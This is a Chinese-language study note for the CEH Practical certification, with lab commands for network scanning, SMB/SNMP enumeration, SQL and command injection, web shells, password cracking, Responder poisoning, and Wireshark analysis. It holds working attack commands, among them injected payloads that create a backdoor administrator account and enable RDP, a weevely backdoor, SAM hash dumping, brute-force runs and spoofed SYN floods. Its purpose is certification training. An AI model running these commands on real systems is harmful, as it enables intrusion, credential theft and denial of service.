• 課程教材分成四個主題

一、掃描列舉

• 工具：nmap
• 情境：不同網段尋找目標
• 語法：nmap <options> <Target IP address>

1-1 尋找存活的主機 Host Discovery

教材指令

# 區網內掃描會直接使用arp scan，若要強制使用ICMP Ping、TCP Ping或UDP Ping要另外下參數
nmap -sn 10.10.10.*
# 結果與上述出現台數不同，多出一台gateway網路設備
sudo nmap -sn 10.10.10.*
# 可以用ip route查看設備IP
ip route
# --reason
nmap -sn 10.10.10.* --reason
sudo nmap -sn 10.10.10.* --reason
# --packet-trace
sudo nmap -sn 10.10.10.* --packet-trace
sudo namp -sn scanme.nmap.org --packet-trace

1-2 尋找主機有服務的端口(埠號) Port Scaning

教材指令

# 掃常用Port
nmap 10.10.10.9
# 全掃
nmap -p- 10.10.10.9
# UDP Scan需要sudo權限
sudo nmap 10.10.10.16 -sU -p53,137-139,161,1900,5353
# WAMP案例掃PORT建議(也可能要掃8080)(考點)
nmap -p80,3306 10.10.10.* --open --reason
nmap -p80,3306 10.10.10.* --open --reason --packet-trace

1-3 識別作業系統及服務版本 Service and OS Discovery

/usr/share/nmap/nmap-os-db

教材指令

sudo nmap 10.10.10.16 -O
sudo nmap 10.10.10.9 -O
# 看到服務版本去找Exploit機會或搭配metasploite
# apache 2.4.41 vulnerability exploitdb
sudo nmap 10.10.10.9 -p80 -sV
sudo nmap 10.10.10.9 -p80 -A
# 找AD主機
sudo nmap 10.10.10.* -p389,636 --open
# 找Domain Controller的FQDN(考點)
sudo nmap 10.10.10.16 -p445,389 -A
sudo nmap 10.10.10.16 -p445,3389 -sVC
# 結合CEH課文參考精準解法，直接可以查到FQDN
sudo nmap 10.10.10.16 --script smb-os-discovery

Windows識別作業系統：nmap --script smb-os-discovery <target>

(自我補充)在AD主機可以可以用以下指令查DC清單
nltest /dclist:<domain_name>

1-4 列舉服務細節資訊 Enumeration

Felo搜尋-krbtgt帳號
Quick Tutorial: SNMP Enumeration
Hydra-Cheatsheet

教材指令

sudo nmap -sU -p161 --open 10.10.10.*
sudo nmap -sU -p161 -sC 10.10.10.16
sudo nmap -sU -p161 --script snmp-win32-users 10.10.10.16
<將找到的user帳號建在一個win32-users.txt>
nbtscan 10.10.10.1-254
enum4linux 10.10.10.16
hydra -L win32-users.txt -P /usr/share/wordlists/nmap.lst smb://10.10.10.16
enum4linux -u martin -p apple -a 10.10.10.16 > day1lab4
# 確認impacket套件是否在0.10以上
python3 -m pip list | grep impacket
# 為了使用CrackMapExec工具，要升級套件
python3 -m pip install --upgrade impacket
# Enumerating SMB Shares
crackmapexec smb 10.10.10.16 -u martin -p apple --shares

impacket套件要在0.10以上才能使

在 /usr/share/nmap/scripts/ 可以找到所有nmap的nse
用 snmp 關鍵字可以找到 snmp 列舉可能會用到的 script

用 smb-enum 也可以找到 smb 列舉可能會用到的 script

CrackMapExec in Action: Enumerating Windows Networks (Part 1)
CrackMapExec in Action: Enumerating Windows Networks (Part 2)

將找到的user帳號建在一個win32-users.txt

hydra -h 可以查指令各種參數的使用方式
大寫參數後面通常都是接字典檔，小寫參數後面通常是接己知的字串值
帳號用-L或-l，密碼用-P或-p

二、注入攻擊

2-1 IDOR

目標：http://10.10.10.19/moviescope

2-2 SQL Injection

• 透過練習1得知注入點
• 可使用sqlmap指令，獲取資料
  ​​​​# SESSION資訊可以在開發者工具用console指令document.cookie取得
  ​​​​sqlmap -u "注入點url" --cookie="SESSION資訊"
  ​​​​# 資料庫列舉
  ​​​​sqlmap -u "注入點url" --cookie="SESSION資訊" --dbs
  ​​​​# 資料表列舉
  ​​​​sqlmap -u "注入點url" --cookie="SESSION資訊" -D 資料庫名稱 --tables
  ​​​​# 取得資料表結構
  ​​​​sqlmap -u "注入點url" --cookie="SESSION資訊" -D 資料庫名稱 -T 資料表名稱 --columns --technique=B
  ​​​​# 取得資料表資料內容
  ​​​​sqlmap -u "注入點url" --cookie="SESSION資訊" -D 資料庫名稱 -T 資料表名稱 --dump --technique=B
  

  
• 沒有--technique=B會亂碼
  
  
• 補充：要進行RCE的話，參數要加上--os-shell
• DVWA的SQL Injection：自己練

2-3 Comman Injection

Felo搜尋-在CMD開啟RDP服務

教材指令

# 利用管線指令
| whoami
# 增加帳號
| net user cehp /add
# 設定密碼
| net user cehp password
# 確定增加的帳號是否存在
| net user
# 指派後門帳號到管理群組
| net localgroup Administrators cehp /add
# 開啟RDP服務 (Google關鍵字：cmd enable rdp service)
| reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# 用netstat指令看服務有沒有被開起來
| netstat -an | findstr :3389
<再來就是直接用RDP服務進入>

2-4 WebShell

# 利用weevely產生web shell
weevely generate cehp backdoor.php
<上傳成功後>
weevely http://10.10.10.16:8080/dvwa/hackable/uploads/backdoor.php cehp

• 補充：google找simple webshell

  joswr1ght/easy-simple-php-webshell.php
  

  

2-5 wpscan工具

• 對象：http://10.10.10.16/ceh/
• 這套工具主要對象是wordpress
  ​​​​whatweb http://10.10.10.16/ceh/
  ​​​​whatweb -v http://10.10.10.16/ceh/
  

  
• wpscan工具

  WordPress Vulnerability Testing with Nmap
  Exploiting WordPress Using WPScan

  ​​​​# 查看指令使用方式
  ​​​​wpscan -h
  ​​​​# User IDs range
  ​​​​wpscan --url http://10.10.10.16:8080/ceh -e u
  ​​​​# password attack 利用CEH課本第14章的字典檔可以找到admin的密碼
  ​​​​wpscan --url http://10.10.10.16:8080/ceh -U admin -P password.txt
  

  

2-6 metasploit工具

Felo搜尋-metasploit攻擊步驟
Metasploit Tutorial 2024: The Complete Beginners Guide
Metasploit For Beginners to Expert
How to exploit port 80 HTTP on Kali Linux
CEH

sudo service postgresql start
msfconsole

• 佈置外掛漏洞

  Photo Gallery <= 1.2.5 - Unrestricted File Upload
  先下載1.2.5有漏洞的外掛版本安裝起來
  

  
  

  
  

  
  

  

2-7 補充：Android設備

紙本教材沒有，是新題目
Android Debugging Bridge (ADB)
Android adb 基本用法教學

nmap -p5555 10.10.10.* --open
# 考試不用裝
sudo apt install -y adb
adb connect 10.10.10.14:5555
adb devices
adb shell

三、破密攻擊

3-1 作業系統

• Windows系統
  • LM, NTLM, Net-NTLMv2, oh my!
  • Windows uses the Security Accounts Manager (SAM) database or Active Directory Database to manage user accounts and passwords in hashed format (a one-way hash).

    

    • SAM file is stored at %SystemRoot%/system32/config/SAM in Windows systems
    • It stores LM or NTLM hashed passwords.
    • The SAM file uses an SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes.
  • NT LAN Manager (NTLM) is a default authentication scheme that performs authentication using a challenge/response strategy.
  • To crack LM hashes using John the Ripper
    ​​​​​​​​john --format=LM --show hashfile.txt
    

  (自我補充)Dumping Hashes from SAM via Registry
  ophcrack - Free Rainbow tables
  This files should be located in C:\windows\system32\config\SAM and C:\windows\system32\config\SYSTEM. But you cannot just copy them in a regular way because they protected.

  • 在Win10主機：The easiest way to steal those files is to get a copy from the registry:
    ​​​​​​​​# 切換到e:\CEH-Tools的資料夾(共享的資料夾)裡
    ​​​​​​​​e:
    ​​​​​​​​cd CEH-Tools
    ​​​​​​​​# 建立一個資料庫
    ​​​​​​​​mkdir pwdump
    ​​​​​​​​# 將帳號資料庫匯出儲存
    ​​​​​​​​reg save hklm\sam pwdump\sam
    ​​​​​​​​# 將系統登錄檔匯出儲存
    ​​​​​​​​reg save hklm\system pwdump\system
    

    

    

  • 在parrot主機

    (自我補充)Dumping credentials with impacket-secretsdump

    ​​​​​​​​# 在parrot主機將共享資料夾裡的pwdump資料夾複製到home裡
    ​​​​​​​​impacket-secretsdump LOCAL -system pwdump/system -sam pwdump/sam -outputfile pwdump/10.10.10.10
    ​​​​​​​​# 再把匯出的資料pwdump/10.10.10.10複製到共享資料夾裡
    

    
  • 在Win10主機裡，教材介紹使用ophcrack
    
    
    
    
    
    
    
    
  • load > PWDUMP file > 點 Crack 開始破密
    
    
    
    
  • 可善用網路工具
    • Google關鍵字：ntlm crackstation
      
      
      
      
      
      
• Linux系統 - john the ripper
  • 自製加密密文
    ​​​​​​​​echo -n hello | md5sum | cut -d ' ' >> md5.txt
    ​​​​​​​​echo -n apollo | md5sum | cut -d ' ' >> md5.txt
    ​​​​​​​​echo -n tiger | md5sum | cut -d ' ' >> md5.txt
    

  • 用john
    ​​​​​​​​# 不知道格式無法破
    ​​​​​​​​john md5.txt
    ​​​​​​​​# 要指定格式
    ​​​​​​​​john md5.txt --format=raw-md5
    

3-2 網路協定

• 破解NetBIOS網路登入密碼 - Responder (舊題目)

  

  • NBT-NS(NetBIOS Name Service)，分別使用不同的埠139或445，目前傾向於使用445埠。
  • LLMNR(Link-Local Multicast Name Resolution)被視為NBT-NS服務的延續。
  • LLMNR/NBT-NS是一種適用於區域網路的網路名稱解析機制，執行時請求端會以UDP發送多播查詢封包，此查詢會被限制在區域網路內。

    不是DNS的替代，它是DNS查詢失敗的情況下改進的解決方案

  • 攻擊者利用 Responder 截取受害者系統的資訊，例如：OS version, client version, NTLM client IP address, NTLM username, 及 password hash.
  • Responder is an LLMNR, NBT-NS, and MDNS poisoner. By default, the tool only responds to a File Server Service request, which is for SMB.

  Gaining Credentials Easily with Responder Tool
  Local Network Attacks: LLMNR and NBT-NS Poisoning Background
  (自我補充)SNIFFING AND CRACKING NTLM HASHES

  • 在parrot
    ​​​​​​​​sudo responder -I eth0
    

    
  • 在Win10
    
    
    登入失敗會出現登入對話框輸入supersuper/Password1

    補充
    

    

  • 在parrot
    
    
    ​​​​​​​​# Responder的log資訊在/usr/share/responder/logs/這個資料夾裡
    ​​​​​​​​cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
    ​​​​​​​​# 準備字典檔
    ​​​​​​​​sudo gzip -d /usr/shar/wordlists/rockyou.txt.gz
    ​​​​​​​​# 進行破解
    ​​​​​​​​# john --wordlist=字典檔 要破解密碼的檔案
    ​​​​​​​​john --wordlist=/usr/shar/wordlists/rockyou.txt /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
    

  • (番外篇) LLMNR/NBT-NS服務安全性不足，可透過本機群組原則關閉LLMNR、透過網路卡介面設定關閉NBT-NS。
• FTP協定 - hydra

  運用CEH-Tools 13章的wordlists
  

  

  ​​​​# 找有開FTP的主機
  ​​​​nmap -p21 10.10.10.* --open
  ​​​​hydra -L Wordlists/Usernames.txt -P Wordlist/Passwords.txt ftp://10.10.10.10
  ​​​​ftp 10.10.10.10
  

  
  
  
  在Win10加入一個檔案
  
  
  在parrot端把flag.txt下載下來
  
  

  Felo搜尋-FTP指令參考

3-3 無線網路

<補充> Aircrack-ng - WiFi 密碼暴力破解

# 可直接破解
aircrack-ng WEPcrack-01.cap
# 不可直接破解
aircrack-ng WPA2crack-02.cap
aircrack-ng WPA2crack-02.cap -w /usr/share/wordlists/nmap.lst

CEH課文摘錄

• Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2 PSK cracker, and analysis tool for 802.11 wireless networks. This program runs under Linux and Windows.
• -w: specifies the path to a wordlist
• -a: specifies the attack mode

CEH課文的實作是用 airodump-ng 側錄封包資訊存檔成 *.cap 檔後，再用 aircrack-ng 破密
CEHP考的是給側錄檔，直接用 aircrack-ng 破密

• [補充參考資訊](雅技資訊日誌) airodump-ng – 無線網路封包擷取

3-4 雜湊及解密

• Cryptanalysis Tools - CrypTool (不會考)

  Triple DES(ECB)
  

  

  • Attackers use cryptanalysis tools to analyze and break ciphers.
• Disk Encryption Tools - VeraCrypt (會考)
  • 會給一個加密的檔案和一組密碼，把檔案掛載起來並從中找到題目指示要找的資訊
    
    
  • CEH課文摘錄
    • Disk encryption is a technology that protects the confidentiality of the data stored on a disk by converting it into an unreadable code using disk encryption software or hardware, thus preventing unauthorized users from accessing it. Disk encryption provides confidentiality and privacy using passphrases and hidden volumes.
    • VeraCrypt is software for establishing and maintaining an on-the-fly-encrypted volume (data storage device). In on-the-fly encryption, data are automatically encrypted immediately before saving and decrypted immediately after loading, without any user intervention. No data stored on an encrypted volume can be read (decrypted) without using the correct password/keyfile(s) or correct encryption keys. The entire file system is encrypted (e.g., file names, folder names, free space, metadata, etc.).
    • Files can be copied to and from a mounted VeraCrypt volume just like they are copied to/from any normal disk (e.g., by simple drag-and-drop operations). Files are automatically decrypted on the fly (in memory/RAM) while they are read or copied from an encrypted VeraCrypt volume. Similarly, files that are written or copied to the VeraCrypt volume are automatically encrypted on the fly (just before they are written to the disk) in RAM.
• File Fingerprinting - HashMyFiles (不會單獨考，會搭配著用)(不用裝，找到後直接執行)
  
  
  • CEH課文摘錄：HashMyFiles produces a hash value for a file using MD5, SHA1, CRC32, SHA-256, SHA-512, and SHA-384 algorithms. The program also provides information about the file, such as the full path of the file, date of creation, date of modification, file size, file attributes, file version, and extension, which helps in searching for and comparing similar files.
• [補充] Cryptography Tools - BCTextEncoder (不用裝，找到工具後直接執行)
  
  
  • 考試給密文和密碼，用工具解密文
  • Step 1 加密 (製作密文)
    • 加密時輸入一組密碼
      
      
    • 加密成功時會密文會出現在下方
      
      
  • Step 2 解密 (載入密文解密，解題的部分)
    • 題目給的密文很清楚知道是用什麼工具加密，就要知道用什麼工具解密
      
      
    • 用工具解密
      
      
  • CEH課文摘錄：The BCTextEncoder utility simplifies the encoding and decoding of text data. It compresses, encrypts, and converts plaintext data into text format, which the user can then copy to the clipboard or save as a text file. It uses public key encryption methods as well as password-based encryption. Furthermore, it uses strong and approved symmetric and public-key algorithms for data encryption.

3-5 資料隱匿

Felo搜尋-隱寫術 (Steganography) 的功能
藏頭詩 - 給圖檔要隱藏資訊，使用Steganography Tools
工具在CEH的Module 06 Steganography Tools

• https://www.offsec.com/metasploit-unleashed/timestomp/
• 圖片隱寫(Image Steganography) - OpenStego軟體
  • 安裝

    

  • Step 1 隱寫資料進圖片(做出有隱藏資訊的圖片)

    

  • Step 2 從圖片萃取隱藏的資訊(解題的部分)
    • 留意有可能會更改副檔名，所以要調整載入副檔名的範圍
      
      
    • 確定要載入的圖片及匯出的位置
      
      
    • 點選「Extract Data」
      
      
    • 可提取被隱藏的文字檔
      
      
• 文件隱寫(Document Steganography) - Snow工具 (不大會考)
  • FREE STEGANOGRAPHY TOOL TO HIDE MESSAGE IN TEXT USING WHITE SPACES
  • Text-based steganography that uses whitespace to conceal information.
  • CEH課文摘錄
    • Whitespace steganography is used to conceal messages in ASCII text by adding whitespaces to the ends of the lines.
    • Snow is a program for concealing messages in text files by appending tabs and spaces to the ends of lines, and for extracting messages from files containing hidden messages. The user hides the data in the text file by appending sequences of up to seven spaces, interspersed with tabs. This usually allows three bits to be stored every eight columns. There is an alternative encoding scheme that uses alternating spaces and tabs to represent 0s and 1s. However, users rejected it because it uses fewer bytes but requires more columns per bit (4.5 vs. 2.67). An appended tab character is an indication of the start of the data, which allows the insertion of mail and news headers without corrupting the data.

  

  ​​​​SNOW.EXE -C -p ceh -m "Passing score: 70" 原始檔.txt 輸出檔.txt
  

  
  
  
  ​​​​SNOW.EXE -C -p ceh 輸出檔.txt
  

四、流量分析

4-1 HTTP分析

Wireshark安裝工具在CEH第3章
(因為第3章提到「OS Discovery using Wireshark」)
可以透過TTL和TCP Window size等欄位識別OS

WireShark主要課文內容集中在CEH第8章Sniffing

• Snffing Tools：System administrators use automated tools to monitor their network, but attackers misuse these tools to sniff network data.
• Wireshark displays data from the TCP port with a feature known as “Follow TCP stream.”
• To see the TCP stream, select a TCP packet in the packet list of a stream/connection and then select the Follow ➔ TCP Stream menu item from the Wireshark Analyze menu.

• Statistics > Protocol Hierarchy

4-2 後門程式(Trojan)

Trojans(後門程式/惡意程式)在CEH第7章

njRAT工具
這題不是考分析流量，而是考如何用njRAT連線遠端已經被植入後門程式的受害機器找檔案。

Statistics > Coversations

4-3 分析Covert TCP流量 (不會考)

4-4 分析Syn Flood

• parrot主機 (考試時用不到，不用記)
  ​​​​# SYN flooding a victim 
  ​​​​# --flood：sent packets as fast as possible
  ​​​​# 
  ​​​​# --rand-source：using random source address mode
  ​​​​# CEHP教材示範，CEH課本(本文未提，但在LAB裡有提到)
  ​​​​hping3 --flood --rand-source -S -p 21 10.10.10.10
  ​​​​# -a <ip_address> or --spoof <ip_address>：spoof source address 
  ​​​​# CEHP教材沒有，老師額外補充，但CEH課本本文有提及(在Module 03)
  ​​​​hping3 --flood -a 10.10.10.9 -S -p 21 10.10.10.10
  

• win10主機封包測錄，分別存檔後比較兩者差異 (考試時用不到，會給測錄檔直接分析)
• 透過測錄所得的資訊，分析受害方哪個IP以及被攻擊的Port是哪一個？
  • 技巧：利用 Statistics > Coversations

4-5 分析 modbus (工控)

• 封包側錄檔載點
• Statistics > Protocol Hierarchy
  
  
  
  
  
  
  • filter：modbus、modbus.func_code==1
  • modbus function code

4-6 補充：分析IoT

一次弄懂 MQTT ！物聯網通訊協定全面指南
[物聯網協定與資安的距離] MQTT 通訊協定淺談
MQTT基本介紹
How to Use Wireshark for MQTT Analysis: An In-depth Guide

• Google關鍵字：MQTT pcap
  • 封包側錄檔載點
• Statistics > Protocol Hierarchy
  • filter：mqtt
  • 注意Publish message：mqtt.msgtype == 3
    
    
    • Analyze > Follow > TCP Stream
      
      
      
      

補充

• 惡意程式分析：PEiD工具（Portable Executable Identifier）

  CEH的第7章
  E:\CEH-Tools\CEHv12 Module 07 Malware Threats\Malware Analysis Tools\Static Malware Analysis Tools\Packaging and Obfuscation Tools\PEid
  

  
  

  

  • 對照CEH課本練習 (Identify Packaging and Obfuscation Methods using PEid)

    Packaging 加殼
    Obfuscation 混淆
    Attackers often use packing and obfuscation or a packer to compress, encrypt, or modify a malware executable file to avoid detection. Obfuscation also hides the execution of the programs. When the user executes a packed program, it also runs a small wrapper program to decompress the packed file, and then runs the unpacked file.
    

    

  • displays the type of packer used in packing a program
    
    
  • 考試要你回答 Entrypoint 值
    • 行為分析－成為逆向大師的第一步－秒懂加殼技術

      一般而言，殼會在軟體被載入後先執行，來對原本的程式碼解密或還原，解殼後才會進入到原本程式真正要開始執行的地方（Orginal Entry Point；OEP）。

  • PEiD主要的功能
• 弱點掃描：OpenVAS

  CEH的第5章
  https://127.0.0.1:9392/login
  admin/password